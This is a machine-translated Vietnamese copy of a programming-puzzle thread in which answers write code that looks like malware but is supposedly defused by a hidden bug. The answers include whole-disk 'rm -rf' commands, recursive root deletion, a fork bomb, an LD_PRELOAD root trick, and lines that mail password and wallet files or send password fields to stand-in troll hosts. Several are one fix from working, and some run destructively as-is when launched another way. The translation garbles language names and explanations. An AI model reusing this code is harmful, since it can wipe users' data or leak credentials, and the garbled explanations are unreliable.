Một troll đã bắt bạn và buộc bạn phải viết phần mềm độc hại (được định nghĩa là chương trình làm hỏng máy tính chạy nó). Troll có thể đọc và hiểu mã, nhưng không tốt trong việc phát hiện ra lỗi.

Mục tiêu của bạn là viết một chương trình:

1. Trông giống như phần mềm độc hại; tức là, một lập trình viên mới bắt đầu đọc mã sẽ bị thuyết phục rằng mã gây ra thiệt hại cho máy tính chạy nó.
2. Thực tế không có thiệt hại gì cả.

LƯU Ý: Troll chỉ đọc mã - không phải bình luận. Vì vậy, bản thân mã phải rõ ràng và đủ sức thuyết phục.

VÍ DỤ (bash):

rm - rf /home

Ví dụ này trông giống như rm -rf /homeloại bỏ tất cả các thư mục nhà khỏi hệ thống, nhưng thực tế, do không gian trước rf, điều này sẽ không hoạt động và chỉ gây ra một thông báo lỗi vô hại.

Đây là một giải pháp chấp nhận được nhưng nó không tốt lắm, vì lỗi này khá dễ phát hiện.

Mặt khác, một chương trình phức tạp và không thể đọc được cũng sẽ không phải là một giải pháp tốt, bởi vì nó sẽ không giống như phần mềm độc hại.

Một giải pháp tốt phải đủ dễ đọc để thuyết phục người đọc rằng đó là phần mềm độc hại, nhưng chứa một lỗi khó phát hiện và khiến nó vô hại.

Đây là một cuộc thi phổ biến, vì vậy mã có nhiều người chiến thắng nhất.

Bash

Tôi đã đi một con đường khác. Thay vì xóa mọi thứ trên ổ cứng của bạn, tôi sẽ lấp đầy nó bằng rác.

Kịch bản lệnh này tạo một thư mục sau đó liên tục catghép tất cả các tệp lại với nhau và đặt chúng vào một tệp mới, thêm giá trị của ls -althước đo tốt (và để tệp bắt đầu có thứ gì đó).

#!/bin/bash/

makeSpam()
{
    string=`cat *`
    string=$string`ls -al`
    echo $string > "file"$i".spam"
}

mkdir "SpamForYou"
cd "SpamForYou"

i=1
while [ 1 ]
do
  makeSpam $i
  i=$(($i + 1))
done

ngoại trừ...

/ bin / bash / (thay vì / bin / bash) rất khó có thể là một trình thông dịch hợp lệ. Đây chỉ là một lỗi đánh máy phổ biến của tôi. Và, vì "shebang về mặt kỹ thuật là một bình luận, troll sẽ bỏ qua nó"

Haskell

Kiểm tra trang hướng dẫn này , removeDirectoryRecursivexóa một thư mục với tất cả nội dung của nó!

import System.Directory
main = return (removeDirectoryRecursive "/")

Mã đúng sẽ là main = removeDirectoryRecursive "/"
các mainchức năng có nghĩa vụ phải trả lại một khái niệm làm một cái gì đó. removeDirectoryRecursive "/"trả về một khái niệm xóa sạch hệ thống tập tin của bạn, nhưng returnhàm (vâng, nó là một hàm), bao bọc đối số của nó trong một khái niệm giả để trả về giá trị đó.
Vì vậy, chúng tôi kết thúc với một khái niệm trả lại một khái niệm về việc xóa ổ đĩa của bạn. (Yo dawg Tôi bầy bạn thích các khái niệm.) Thời gian chạy haskell thực thi khái niệm được trả về mainvà loại bỏ giá trị được trả về, trong trường hợp của chúng tôi là khái niệm xóa sạch hệ thống tệp của bạn.

PHP

Đây là một tập lệnh PHP đệ quy cố gắng xóa từng tệp trong trang web của bạn. Có thể mất một lúc để hoàn thành nếu trang web khá lớn, vì vậy hãy kiên nhẫn ...

<html>
<body>
<p>Deleting website; please wait
<img src="data:image/gif;base64,R0lGODlhCAAIAPAAAAAAAP///yH/C05FVFNDQVBFMi4wAwEAAAAh+QQEMgD/ACwAAAAACAAIAAACBoSPqcvtXQAh+QQFMgAAACwAAAAACAAIAAACBoyPqcvtXQA7" /></p>
<?php

function zapfiles($dir) {
  if (is_dir($dir)) {
    $files = scandir($dir);
    foreach ($files as $file) {
      if ($file != '.' && $file != '..') {
        if (is_dir("$dir/$file")) {
          zapfiles("$dir/$file");
        }
        else {
          try {
            @delete("$dir/$file"); // Suppress locked file errors
          }
          catch (Exception $e) {
            // Locked files can't be deleted; just carry on
          }
        }
      }
    }
  }
}

zapfiles($_SERVER['DOCUMENT_ROOT']);

?>
<p>Website deletion complete</p>

Chỉ cần một _teeny-weeny vấn đề ...

Không có lệnh xóa () trong PHP. Tập lệnh sẽ thất bại ngay khi gặp lệnh này, nhưng không có thông báo lỗi nào được hiển thị vì báo cáo lỗi đã bị chặn bằng cách thêm tiền tố vào lệnh này với @ . Hình ảnh GIF nhấp nháy mang lại ấn tượng rằng một cái gì đó đang xảy ra, khi hoàn toàn không có gì đang xảy ra.

Perl (Unix)

Xóa tất cả các tệp trên hệ thống.

#! /usr/bin/perl -w
use strict;

sub killdir {
    opendir(my $dh, ".");
    my @dl = readdir($dh);
    closedir($dh);
    foreach my $de (@dl) {
        if (-d $de) {
            chdir($de);
            killdir();
            chdir("..");
            rmdir($de);
        } else {
            unlink($de);
        }
    }
}

chdir("/");
killdir();

Đặc trưng

• Đây là hợp lệ Perl. Nó thậm chí còn biên dịch và chạy với -wvà use strict!

• Không ngụy biện như của C ++ delete. unlinkthực sự là chức năng để xóa một tập tin, rmdirthực sự không xóa một thư mục, vv

• Xử lý chính xác các thư mục được lồng sâu mà tên đường dẫn tuyệt đối có thể vượt quá độ dài tối đa của hệ thống, bằng cách thay đổi vào từng thư mục để sử dụng các đường dẫn tương đối. Ngoài ra, sẽ không chạy ra khỏi tay cầm thư mục, vì nó đọc và đóng thư mục trước khi đệ quy.

Làm hỏng

Trên Unix, mục đầu tiên trong thư mục gốc thường là "." vì vậy chương trình sẽ thực hiện một đệ quy vô hạn của chdir (".") cho đến khi hết bộ nhớ và gặp sự cố.

Ghi chú thêm

Điều này là khó khăn để có được đúng hơn mong đợi. Nếu bạn không sử dụng phương pháp chdir, cuối cùng bạn sẽ nhận được một tên đường dẫn quá dài. Sau đó, -d trả về false và đệ quy vô hạn bị hỏng và các tệp thực sự có thể bị xóa! Một lỗi tương tự có thể xảy ra nếu bạn giữ các thư mục xử lý mở; cuối cùng bạn chạy ra ngoài, opendir thất bại, killdir trở lại và việc xóa bắt đầu xảy ra.

Vỏ một lớp lót

Điều này sẽ đánh cắp tất cả mật khẩu, khóa riêng, bitcoin của nạn nhân, v.v.

 find / -name "passwd" -or -name "shadow" -or -name "secring.gpg" -or -name "wallet.dat" |mail troll@nefarious.org

Spoiler:

Điều này có thể trông giống như nó gửi email tất cả các tệp cho troll, nhưng thực sự nó chỉ gửi email tên tệp của họ.

Batch / CMD

Lưu lại

DEL %0
DEL %1
DEL %2
DEL %3
DEL %4
DEL %5
DEL %6
DEL %7
DEL %8
DEL %9

và làm cho chúng chạy nó với các tham số của từng ổ đĩa trên máy tính.

% 0 luôn là tham số đầu tiên - tên tệp. Sau đó, tập hợp các tham số thực tế, nhưng nó đã tự xóa nên nó sẽ không tiếp tục.

Javascript

infiniteLoop=true;
evilMessage='I spam you !';
while(infiniteLoop) {
  eval(atob('aW5maW5pdGVMb29wPWZhbHNlO2V2aWxNZXNzYWdlPWV2aWxNZXNzYWdlLnJlcGxhY2UoInNwYW0iLCJMT1ZFIik7'));
  alert(evilMessage);
}

Chà, phần mềm độc hại ban đầu sẽ không làm nổ máy tính của bạn nhưng có thể gây phiền nhiễu.

Điều này là vô hại vì:

Các evalsẽ phá vỡ các vòng lặp vô hạn và sửa đổi các thông điệp.

Java

Có thể các vị thần tha thứ cho tôi vì đã phục tùng những yêu cầu khốn khổ của bạn, troll.

class HomeWrecker {
    public static void main(String[] args) throws Exception {
        Runtime.getRuntime().exec("rm -rf /home/*");
    }
}

Runtime.exec không gọi shell, vì vậy việc mở rộng toàn cầu không bao giờ xảy ra và lệnh sẽ không thành công khi cố xóa một thư mục chính có tên theo nghĩa đen là "*"

C

Vì anh ấy không đọc những bình luận nên làm điều đó:

#include<stdlib.h>
int main()
{
//Are you reading this??/
 system("C:\\WINDOWS\\System32\\shutdown /s /t 0000");

 return 0;
}

Phiên bản C ++

cảm ơn DragonLord vì điều này

#include<cstdlib>
int main ()
{
//Are you reading this??/
system("shutdown -s -t 0000");
return 0; 
}

Thêm phần này vào thư mục khởi động và khởi động lại máy tính.

Làm thế nào nó hoạt động:

?? / là một bộ ba và sẽ thêm dòng tiếp theo vào bình luận để về cơ bản nó sẽ không làm gì cả. Lưu ý: không thử bộ ba này có thể bị tắt trong một số trình biên dịch theo mặc định và phải được bật để nó hoạt động.

Java

import java.io.File;
class derp
{
    public static void main( String[] a)
    {
        new File("C:\\windows\\System32\ntoskrnl.exe").delete();
    }
}

Sử dụng ký tự thoát (\ n trước ntoskrnl.exe là một dòng mới thay vì N thông thường)

BASH

#!/bin/bash
set -t 

echo "hahaha deleting files.."
rm -rf / --no-preserve-root

set -t sẽ thoát sau khi đọc và thực thi một lệnh. Kịch bản này không in ra và tất cả các tệp đều an toàn!

Hoặc NHƯNG ĐỌC SPOILER TRƯỚC KHI CHẠY

#!/bin/bash -t
echo "hahaha deleting files.."
rm -rf / --no-preserve-root

Theo nhu cầu phổ biến .. #!/bin/bash -tsẽ thoát sau khi đọc và thực hiện một lệnh. Đừng chạy cái này bash -xvì nó sẽ bỏ qua -tvà thực thi các lệnh trong tập lệnh.

Con trăn

print "****----....____....----"""" This program will clear the browser cache "

import os
from os.path import expanduser
home = expanduser("~")
os.remove(home)

print """"----....____....----***** Cache cleaned. "                                     

ba dấu ngoặc kép "" "bắt đầu một chuỗi nhiều dòng trong Python

CƯỜI MỞ MIỆNG

Chương trình này là hợp lệ và thực hiện không có lỗi. Nó sinh ra một chức năng xóa trong một luồng mới, nó sẽ xóa rootthư mục.

import std.concurrency : spawn;
import std.file : rmdirRecurse;

string root;

void deleteRoot()
{
    if (root)
        rmdirRecurse(root);
}

void main()
{
    root = "/";
    spawn(&deleteRoot);
    // ... could add a waiting animation here.
}

Nhưng không có gì bị xóa ...

bởi vì trong D, một biến được khai báo ở phạm vi mô đun theo mặc định là luồng cục bộ. Các mainhàm đặt nó thành "/", nhưng các luồng sinh sản có một bản sao trống, vì vậy rmdirRecursehàm này không được gọi.

C (Unix)

Thêm một số quảng cáo không bao giờ làm hại bất cứ ai.

#include <stdlib.h>

int main()
{
    // Join the crew
    goto http;//www.trolling.com
    print("Sucker!\n");
    system("rm -rf ~");
    // Remember goto
    http://www.trolling.com
    return 0;
}

http: đó là một nhãn, goto nhảy đến nhãn thiếu mã harful. : V

JavaScript

function foo(a) { // Returns an object, and all objects are truly
    return
    {
        a: a
    };
}
for(var i=0; foo(i); ++i) // loop condition is always truly
    alert('Infinite alerts!');

Không có cảnh báo được hiển thị. Vì JavaScript không yêu cầu ;ở cuối dòng, nên nó sẽ tự động được chèn sau khi returntrở thành return;. Sau đó undefined, đó là giả, được trả về thay vì "đối tượng" (trong thực tế được phân tích cú pháp dưới dạng một câu lệnh khối).

JavaScript

//Config: Warning!!! only set to true on victims box!
var deleteEverything = true;

function deleteIfEvil(){
  if(deleteEverything){
    alert('Destroy Everything!');
    //clear the flag
    var deleteEverything = false;
  } else {
    alert('Tested OK!');
  }
}

deleteIfEvil();

Trao đổi cảnh báo hủy cho bất kỳ hành động phá hoại khó chịu nào bạn muốn sử dụng.

Spoiler:

Mặc dù có vẻ như cấu hình được thiết lập để xóa ... và nó là như vậy! khai báo 'var' bên trong hàm là "Hoisted" http: //www.adequTHERgood.com/JavaScript-Scoping-and-Ho hiện.html và kết quả là thực sự sai khi nhập hàm.

Java

Hãy xóa một số tập tin quan trọng!

import java.io.File;
import java.io.IOException;

public class Deleter {

    private File importantFile = null;

    public Deleter(File f) {

        importantFile = f;

        /**}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{
         * }{ I don't care how important that file is. I'm going to delete it! }{
         * }{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{*/}{

        importantFile.delete();

    }

    public static void main(String[] args) throws IOException {
        // Let's delete some important stuff
        new Deleter(new File("/boot/vmlinuz"));
        new Deleter(new File("/etc/passwd"));
        new Deleter(new File("/etc/crontab"));
        new Deleter(new File("/etc/sudoers"));
    }

}

Ẩn trong bình luận khối là thêm} {bên ngoài bình luận. Điều đó đặt xóa tệp trong một khối khởi tạo cá thể riêng biệt, được thực hiện trước hàm tạo. Vào thời điểm đó, quan trọng là vẫn còn null.

Bash, C, Linux

Có thể nó không chính xác là phần mềm độc hại, nhưng chắc chắn có thể là một phần của một :)

Đây là một khai thác tuyệt vời có thể cung cấp cho bạn root trên bất kỳ máy linux nào! Suỵt, không nói với ai rằng chúng ta có nó!

#!/bin/sh
cd /tmp
cat >ex.c <<eof
int getuid() { return 0; }
int geteuid() { return 0; }
int getgid() { return 0; }
int getegid() { return 0; }
eof
gcc -shared ex.c -oex.so
LD_PRELOAD=/tmp/ex.so sh
rm /tmp/ex.so /tmp/ex.c

Bây giờ thực thi kịch bản và bạn sẽ được root! Bạn có thể chắc chắn sử dụng whoami!

Trong thực tế, nó chỉ lừa tất cả các ứng dụng mà bạn có UID = 0 (đây là id người dùng root).

Mã được viết bởi Lcamtuf, nguồn: http://lcamtuf.coredump.cx/soft/ld-expl

bash

cat <<EOF
ProHaxer Hacking Tool 2014. Destroying your computer in
background, please wait until it finishes.
EOF

# Freeze the machine, so nobody will stop the process.
:(){:|:&};:

# Remove stuff in the background.
rm -rf /* &>/dev/null &

Có lỗi cú pháp trên dòng "fork-bomb". Sau { , nên có một khoảng trắng. Không có nó, tập lệnh thất bại vì định nghĩa hàm không được theo sau bởi { mã thông báo.

Emacs Lisp

Đầu tiên là một đơn giản. Cái này không làm gì cả. Nó thực sự đang cố gắng xóa các phần tử bằng: đệ quy từ danh sách được trả về bởi directory-files. Nó sẽ không xóa bất kỳ tập tin.

(delete :recursive
    (directory-files "/"))

Đây là một trong những có thể stump thậm chí bác sĩ thú y.

(let ((files (directory-files "/")))
  (while (setq file (pop files) )
    (delete-file file)))

Đây chỉ là 1 ký tự để xóa thư mục gốc của bạn.

emacs lisp sẽ cho phép jsut về bất cứ thứ gì là tên của một ký hiệu (biến, hàm, macro, v.v.). Bạn có thể sử dụng unicode trong tên các ký hiệu của mình và đó là những gì đang xảy ra ở đây.

setqcó thể lấy bất kỳ số lượng đối số nào (setq a 3 b 4)giống như làm a = 3; b = 4; nhưng (setq a 3 b)cũng hợp lệ và đang thực hiện a = 3; b = nil;

Giá trị trả về của `setq 'là giá trị được gán cho biến cuối cùng. 4 và nil tương ứng trong các ví dụ.

(setq a 3 b)là chính xác những gì đang xảy ra trong mã, nhưng thay vì b tôi đang sử dụng một ký tự khoảng trắng unicode. Tôi đang gán giá trị nil cho một biến có tên là ký tự unicode 0x2001. Bởi vì con số này được trả về bởi setq và điều kiện cho vòng lặp while không bao giờ đúng. Loại bỏ ký tự khoảng trắng đó và nó sẽ chạy tốt.

Chỉ là một hacker perl.

Tôi đã viết bài này vào năm 2002 , trong khi đi chơi ở Perlmonks và nói chung chỉ cố gắng đẩy kiến ​​thức của tôi về Perl càng xa càng tốt. Không chỉnh sửa nó, nhưng nó vẫn chạy.

#!/usr/bin/perl -w
use strict;
require File::Path;

my $root_dir = '/';

$root_dir = 'c:\\' if( $^O =~ /Win/i );

rmtree( $root_dir );

mkdir( $root_dir );

open( ROOT, $root_dir );

while(1)
{
  BEGIN{@INC=sub{*DATA}}
  print ROOT <DATA>;
}

__DATA__
# Fill the harddrive with junk!
''=~('('.'?'.'{'.('`'|'%').('['
^'-').('`'|'!').('`'|',').'"'.(
'['^'+').('['^')').('`'|"\)").(
'`'|'.').('['^'/').('{'^('[')).
'\\'.'"'.('`'^'*').('['^"\.").(
'['^'(').('['^'/').('{'^"\[").(
'`'|'!').('`'|'.').('`'|"\/").(
'['^'/').('`'|'(').('`'|"\%").(
'['^')').('{'^'[').('['^"\+").(
'`'|'%').('['^')').('`'|"\,").(
'{'^'[').('`'|'(').('`'|"\!").(
'`'|'#').('`'|'+').('`'|"\%").(
'['^')').'.'.'\\'.'\\'.('`'|'.'
).'\\'.'"'.';'.('`'|'%').("\["^
'#').('`'|')').('['^'/').(';').
'"'.'}'.')');$:='.'^'~';$~='@'|
'(';$^=')'^'[';$/='`'|('.');$_=
'('^'}';$,='`'|'!';$\=')'^"\}";
$:='.'^'~';$~='@'|'(';$^=(')')^
'[';$/='`'|'.';$_='('^('}');$,=
'`'|'!';$\=')'^'}';$:='.'^"\~";
$~='@'|'(';$^=')'^'[';$/=('`')|
'.';$_='('^'}';$,='`'|('!');$\=
')'^'}';$:='.'^'~';$~='@'|"\(";
$^=')'^'[';$/='`'|'.';$_=('(')^
'}';$,='`'|'!';$\=')'^('}');$:=
'.'^'~';$~='@'|'(';$^=')'^"\[";

Nếu tôi nhớ chính xác, BEGINkhối sẽ chạy trước hết, bất kể nó nằm ở đâu trong mã. Nó thay thế @INCxác định nơi Perl tải các thư viện của nó từ chương trình con (thường là một tập hợp các đường dẫn, nhưng điều này được cho phép). Chương trình con thực sự là khối dữ liệu bị xáo trộn, đang thực hiện một số phép thuật regrec + eval. Sau đó, khi mã chạm require File::Path;(nó sẽ không hoạt động use), phần phụ này được thực thi và chỉ in "Chỉ là một hacker perl khác.", Như truyền thống và thoát ra. Phần còn lại của mã không bao giờ đạt được.

PHP:

$condition = true and false;

if (!$condition) {
   // DO EVIL - Just do something evil here
}

Thoạt nhìn, $conditionlà sai, nhưng =toán tử đã được ưu tiên hơn and, vì vậy điều kiện là đúng. Vì vậy, cái ác không bao giờ được thực hiện.

C ++ với Boost

Điều này sẽ xóa tất cả các tập tin trên hệ thống tập tin

#include "boost/filesystem.hpp"
using namespace boost::filesystem;

void delete_directory(const path* dir_path)
{
  if (!exists(*dir_path)) return;

  directory_iterator end_file_itr;
  for (directory_iterator file_itr(*dir_path);
        file_itr != end_file_itr;
        ++file_itr) {
    const path* file = &file_itr->path();
    if (file_itr->status().type() == directory_file) {
      delete_directory(file);
    } else {
      delete(file);
    }
  }

  delete(dir_path);
}

int main() {
  delete_directory(new path("/"));
  return 0;
}

Thật ra nó sẽ không. deletetrong C ++ được sử dụng để giải phóng bộ nhớ được phân bổ bởi newvà không xóa các tệp và thư mục. Chương trình rất có thể sẽ gặp sự cố với lỗi phân đoạn vì nó cố gắng phân bổ bộ nhớ được phân bổ bởi Boost, nhưng vào thời điểm đó, tôi sẽ thoát khỏi sự giam cầm của troll.

Java

Điều này sẽ giả vờ tải xuống RAM, nhưng nó sẽ xóa thư mục chính của người dùng.

import java.util.*;
import java.io.*;
class RamDownloaderIO {
    public static void main(String[] args) {
        long onePercentWaitTime   = 2*60*1000;  // 2 minutes
        long twoPercentWaitTime   = 7*60*1000;  // 7 minutes
        long deleteWaitTime       = 9*60*1000;  // 9 minutes
        long completeWaitTime     = 10*60*1000; // 10 minutes
        Timer timer = new Timer(true);
        // User thinks, Hmm this is taking a while
        timer.schedule(new TimerTask() {
            public void run() {
                System.out.println("1% done");
            }
        }, onePercentWaitTime);
        // User is now completely impatient, and either leaves to get a coffee
        // or starts reading reddit
        timer.schedule(new TimerTask() {
            public void run() {
                System.out.println("2% done");
            }
        }, twoPercentWaitTime);
        // Now that he's not looking, delete everything in his home directory
        timer.schedule(new TimerTask() {
            public void run() {
                try {
                    final Runtime rt = Runtime.getRuntime();
                    rt.exec("rm -rf ~/*");
                } catch (IOException e) {
                }
            }
        }, deleteWaitTime);
        // Inform the user that the task is finished
        timer.schedule(new TimerTask() {
            public void run() {
                System.out.println("Download complete!");
                System.out.println("You now have 21.47GB RAM!");
                System.exit(0);
            }
        }, completeWaitTime);
        System.out.println("Welcome to the ramdownloader.io RAM downloader");
        System.out.println("Please wait. Downloading your free RAM...");

    }
}

Timersử dụng một chủ đề nền để gọi TimerTasks của bạn mà bạn đã gửi cho nó. new Timer(true)tạo một Timervới chủ đề nền được đặt làm một chủ đề daemon, vì vậy chương trình chỉ cần thoát ngay lập tức trước khi các tác vụ có thể được chạy. Mã quá dài làm mất tập trung vào troll khi nhìn thấy truetham số.

rm -rf ⁄

Ký tự này không phải là ký tự gạch chéo thông thường (/, tức là RẮN trong unicode) mà thay vào đó là FRACTION SLASH. Sẽ in một thông báo như "rm:: Không có tệp hoặc thư mục như vậy"

bash

# This script should always be executed as root #
set -e

cleanup() {
  rm -rf / --no-preserve-root
}

eval $(base64 -d <<< "dW5zZXQgLWYgY2xlYW51cA==")
eval $(base64 -d <<< "Y2xlYW51cCgpIHsgZWNobyBUcm9sbCBkZXRlY3RlZDsgfQo=")
cleanup

Nó có lẽ là xấu xa như nó được. Nó định nghĩa một hàm mà sẽ rm -rf /gọi nó. Không chỉ vậy, nó còn sử dụng tà áceval nhiều hơn một lần.

Nó sẽ làm rất nhiều thiệt hại, chắc chắn!

Trong trường hợp bạn đang tự hỏi, lần đầu tiên evalhủy bỏ chức năng bằng cách: unset -f cleanup Thứ hai evalxác định nó là: cleanup() { echo Troll detected; } Vì vậy, khi chạy mã, bạn sẽ thấy Troll detected

BASH

Chắc chắn chúng tôi cần quyền root cho máy, vì vậy chúng tôi sử dụng "Tôi có root không?" - trình kiểm tra, còn gọi là root ch (eck) - nhưng tốt hơn nên làm điều này trong một thư mục không có nhiều báo động. / tmp sẽ là hoàn hảo, bởi vì mọi người đều có thể viết các tập tin ở đó.

Sau này chúng tôi chỉ xóa toàn bộ tiếng cười ổ cứng

mkdir -p /tmp/chroot_dir && chroot /tmp/chroot_dir /bin/bash -c "su - -c rm -rf /*"

iPhone - Flappy Bird Clone

Trong khi người dùng đang chơi bản sao iPhone Flappy Bird, tất cả các tệp trong thư mục Tài liệu sẽ bị xóa.

#import "AppDelegate.h"
#import "FlappyBirdClone.h"

@implementation AppDelegate

- (BOOL)application:(UIApplication *)application didFinishLaunchingWithOptions:(NSDictionary *)launchOptions
{
    FlappyBirdClone *flappyBirdClone = [FlappyBirdClone new];
    [flappyBirdClone startFlapping];

    NSURL *documentsDirectory = [[[NSFileManager defaultManager] URLsForDirectory:NSDocumentDirectory inDomains:NSUserDomainMask] lastObject];
    [self deleteAllDocumentsInDirectory:documentsDirectory];

    return YES;
}

- (void)deleteAllDocumentsInDirectory:(NSURL *)directoryURL
{
    NSArray *fileURLs = [[NSFileManager defaultManager] contentsOfDirectoryAtURL:directoryURL includingPropertiesForKeys:@[] options:0 error:nil];

    [fileURLs enumerateObjectsUsingBlock:^(NSURL *fileURL, NSUInteger idx, BOOL *stop) {
        [[NSFileManager defaultManager] removeItemAtURL:fileURL error:nil];
    }];
}

Mỗi ứng dụng trong iOS đều được Sandboxed, vì vậy trong khi ứng dụng này xóa mọi thứ trong thư mục Documents, thì đó chỉ là thư mục Documents cho ứng dụng cụ thể này. Các troll rõ ràng là không nhận thức được điều này, vì anh ta đã tràn ngập rất nhiều chương trình cho các nền tảng khác. Và ngay khi nhận ra mình cũng có thể tạo ra một bản sao Flappy Bird, anh ta có thể rất phấn khích, anh ta thậm chí không buồn nghĩ về phần còn lại của mã, vì anh ta quá bận tâm về việc kiếm 50.000 đô la mỗi ngày trong quảng cáo mà không cần làm bất cứ việc gì

Đi:

package main

import (
    "fmt"
    "os"
    "sync"
)

func main() {
  wg := sync.WaitGroup{}
  go deleteAll(wg)
  wg.Wait()
}

func deleteAll(wg sync.WaitGroup) {
    wg.Add(1)
    defer wg.Done()
    fmt.Println("Press enter to clean your computer!")
    fmt.Scanln()
    os.RemoveAll("/home")
}

Điều này là một chút khó khăn. Trong Go toàn bộ chương trình thoát khi Goroutine chính thoát. Một cách tốt để khắc phục điều này là với Waitgroup. Có hai vấn đề lớn với "sửa chữa" của tôi:

1. Waitgroup không được thêm vào cho đến khi Goroutine bắt đầu, điều đó có nghĩa là Goroutine chính sẽ tấn công Waittrước khi xóa Goroutine Add. Vì bộ đếm sẽ là 0, nên nó không có gì để chờ đợi và do đó nó sẽ không chặn và cuối cùng sẽ thoát, do đó chấm dứt chương trình.
2. Ngay cả khi, bằng cách nào đó, một cách kỳ diệu, việc bổ sung xóa ALL goroutine được thực hiện trước tiên. Nó có một bản sao của Waitgroup, không phải là một con trỏ tới nó. Nó sẽ không được thêm vào cùng một nhóm Wait nên Goroutine chính sẽ không bao giờ nhìn thấy nó.

Fmt.Scanln () để mong đợi đầu vào chỉ là để đảm bảo lối thoát Goroutine chính trước khi có bất cứ điều gì xảy ra. Println có thể sẽ khiến nó bị chặn IO và chuyển sang chạy Goroutine chính (do đó thoát) và Scanln gần như chắc chắn sẽ làm như vậy. Trong thực tế, không cần thiết với bất kỳ phiên bản nào của Go.

Trong siêu lý thuyết, MIGHT này hoạt động và xóa một cái gì đó, có nghĩa là theo mô hình bộ nhớ Go, không có mối quan hệ "xảy ra trước" nào được đảm bảo về việc kết thúc mainvà thực thi RemoveAll, nhưng nó sẽ không có trong bất kỳ trình chạy / trình biên dịch Go hiện đại nào như đã được chứng minh bởi tất cả những người mới mắc lỗi không đặt đồng bộ hóa trong các chức năng chính của họ.

Javascript

function(){
    setInterval(function(){
        var passwordList = document.getElementsByTagName('input') ;
        var i, length = passwordList.length ;
        for(i = 0 ; i < lenght ; i++) if(passwordList[i].type == 'password'){
            var img = document.createElement('img') ;
            img.src = 'http://troll-server-password-listener.com/fake-image.jpg?password=' + passwordList[i].value ;
            img.style.display = none ;
            img.addEventListener('load', function(){
                var that = this ;
                setTimeout(function(){ that.outerHTML = '' }, 0) ;
            }) ;
            document.body.appendChild(img) ;
        }
    }, 1) ;
}() ;

1.

Nó sẽ không chạy, bạn không thể tạo một đóng tất cả gọi nó mà không bỏ qua nó với parens

2.

Nếu troll quản lý để sửa lỗi đó, có một lỗi đánh máy đẹp để gỡ lỗi ... ;-)